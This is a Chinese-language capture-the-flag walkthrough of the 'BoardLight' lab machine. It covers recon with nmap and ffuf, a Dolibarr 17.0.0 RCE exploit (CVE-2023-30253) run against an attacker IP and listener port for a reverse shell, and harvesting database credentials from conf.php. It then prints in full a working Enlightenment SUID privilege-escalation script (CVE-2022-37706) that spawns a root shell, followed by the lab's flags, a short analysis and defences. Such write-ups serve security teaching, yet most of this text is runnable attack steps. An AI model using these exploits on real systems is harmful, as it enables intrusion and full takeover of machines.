[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+Enlightenment v0.25.3权限提升

字数 1343 2025-08-20 18:18:40

Dolibarr 17.0.0 RCE + Enlightenment v0.25.3 权限提升漏洞利用教学文档

1. 信息收集阶段

1.1 端口扫描

使用nmap进行端口扫描：

nmap -p- 10.10.11.11 --min-rate 1000 -sC -sV

发现开放端口：

22/tcp - OpenSSH 8.2p1 (Ubuntu Linux)
80/tcp - Apache httpd 2.4.41 (Ubuntu)
其他多个过滤端口

1.2 Web服务探测

使用whatweb识别Web技术：

whatweb 10.10.11.11

1.3 子域名枚举

首先将目标域名添加到hosts文件：

echo "10.10.11.11 board.htb" | tee -a /etc/hosts

使用ffuf进行子域名爆破：

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://board.htb -H "Host: FUZZ.board.htb" -fs 15949

发现子域名crm.board.htb，添加到hosts：

echo "10.10.11.11 crm.board.htb" | tee -a /etc/hosts

2. Dolibarr 17.0.0 RCE漏洞利用

2.1 漏洞背景

Dolibarr 17.0.0存在远程代码执行漏洞(CVE-2023-30253)

2.2 利用步骤

使用公开的exp脚本：

python3 exp.py http://crm.board.htb admin admin 10.10.16.24 10032

其中：

http://crm.board.htb 为目标URL
admin/admin 为凭据
10.10.16.24 为攻击者IP
10032 为监听端口

获取数据库凭据：

cat ./crm.board.htb/htdocs/conf/conf.php

发现凭据：

用户名: dolibarrowner
密码: serverfun2$2023!!

使用凭据SSH登录：

ssh larissa@10.10.11.11

密码为上面获取的密码

获取user flag：

cat /home/larissa/user.txt

结果为：b7f82dc5b4ed058a7ea007f02cafde10

3. 权限提升(Enlightenment v0.25.3)

3.1 查找SUID文件

find / -perm -4000 -type f 2>/dev/null

3.2 漏洞利用(CVE-2022-37706)

创建exp.sh脚本：

#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
 echo "[-] Couldn't find the vulnerable SUID file..."
 echo "[*] Enlightenment should be installed on your system."
 exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

执行脚本：

chmod +x exp.sh
bash exp.sh

获取root flag：

cat /root/root.txt

结果为：f1844b04972e657f7e59544e69e23c20

4. 漏洞分析

4.1 Dolibarr RCE漏洞

Dolibarr 17.0.0中存在文件上传漏洞，允许攻击者上传恶意文件并执行任意代码。漏洞存在于文件上传功能中，未对上传文件类型进行充分验证。

4.2 Enlightenment权限提升漏洞

Enlightenment v0.25.3中的enlightenment_sys SUID二进制文件存在路径遍历漏洞，允许本地用户通过精心构造的参数执行任意命令。该漏洞源于对用户提供的路径参数处理不当，导致命令注入。

5. 防御措施

5.1 Dolibarr防御

升级到最新版本
限制文件上传类型
实施严格的输入验证
使用Web应用防火墙(WAF)

5.2 Enlightenment防御

升级Enlightenment到最新版本
移除不必要的SUID权限
实施最小权限原则
监控系统日志中的可疑活动

6. 参考资源

Dolibarr RCE漏洞详情：https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
Enlightenment提权漏洞详情：https://www.exploit-db.com/exploits/51180
Nmap扫描技术：https://nmap.org/book/man.html
Ffuf使用指南：https://github.com/ffuf/ffuf

Dolibarr 17.0.0 RCE + Enlightenment v0.25.3 权限提升漏洞利用教学文档 1. 信息收集阶段 1.1 端口扫描使用nmap进行端口扫描：发现开放端口： 22/tcp - OpenSSH 8.2p1 (Ubuntu Linux) 80/tcp - Apache httpd 2.4.41 (Ubuntu) 其他多个过滤端口 1.2 Web服务探测使用whatweb识别Web技术： 1.3 子域名枚举首先将目标域名添加到hosts文件：使用ffuf进行子域名爆破：发现子域名crm.board.htb，添加到hosts： 2. Dolibarr 17.0.0 RCE漏洞利用 2.1 漏洞背景 Dolibarr 17.0.0存在远程代码执行漏洞(CVE-2023-30253) 2.2 利用步骤使用公开的exp脚本：其中： http://crm.board.htb 为目标URL admin/admin 为凭据 10.10.16.24 为攻击者IP 10032 为监听端口获取数据库凭据：发现凭据：用户名: dolibarrowner 密码: serverfun2$2023! ! 使用凭据SSH登录：密码为上面获取的密码获取user flag：结果为：b7f82dc5b4ed058a7ea007f02cafde10 3. 权限提升(Enlightenment v0.25.3) 3.1 查找SUID文件 3.2 漏洞利用(CVE-2022-37706) 创建exp.sh脚本：执行脚本：获取root flag：结果为：f1844b04972e657f7e59544e69e23c20 4. 漏洞分析 4.1 Dolibarr RCE漏洞 Dolibarr 17.0.0中存在文件上传漏洞，允许攻击者上传恶意文件并执行任意代码。漏洞存在于文件上传功能中，未对上传文件类型进行充分验证。 4.2 Enlightenment权限提升漏洞 Enlightenment v0.25.3中的enlightenment_ sys SUID二进制文件存在路径遍历漏洞，允许本地用户通过精心构造的参数执行任意命令。该漏洞源于对用户提供的路径参数处理不当，导致命令注入。 5. 防御措施 5.1 Dolibarr防御升级到最新版本限制文件上传类型实施严格的输入验证使用Web应用防火墙(WAF) 5.2 Enlightenment防御升级Enlightenment到最新版本移除不必要的SUID权限实施最小权限原则监控系统日志中的可疑活动 6. 参考资源 Dolibarr RCE漏洞详情：https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253 Enlightenment提权漏洞详情：https://www.exploit-db.com/exploits/51180 Nmap扫描技术：https://nmap.org/book/man.html Ffuf使用指南：https://github.com/ffuf/ffuf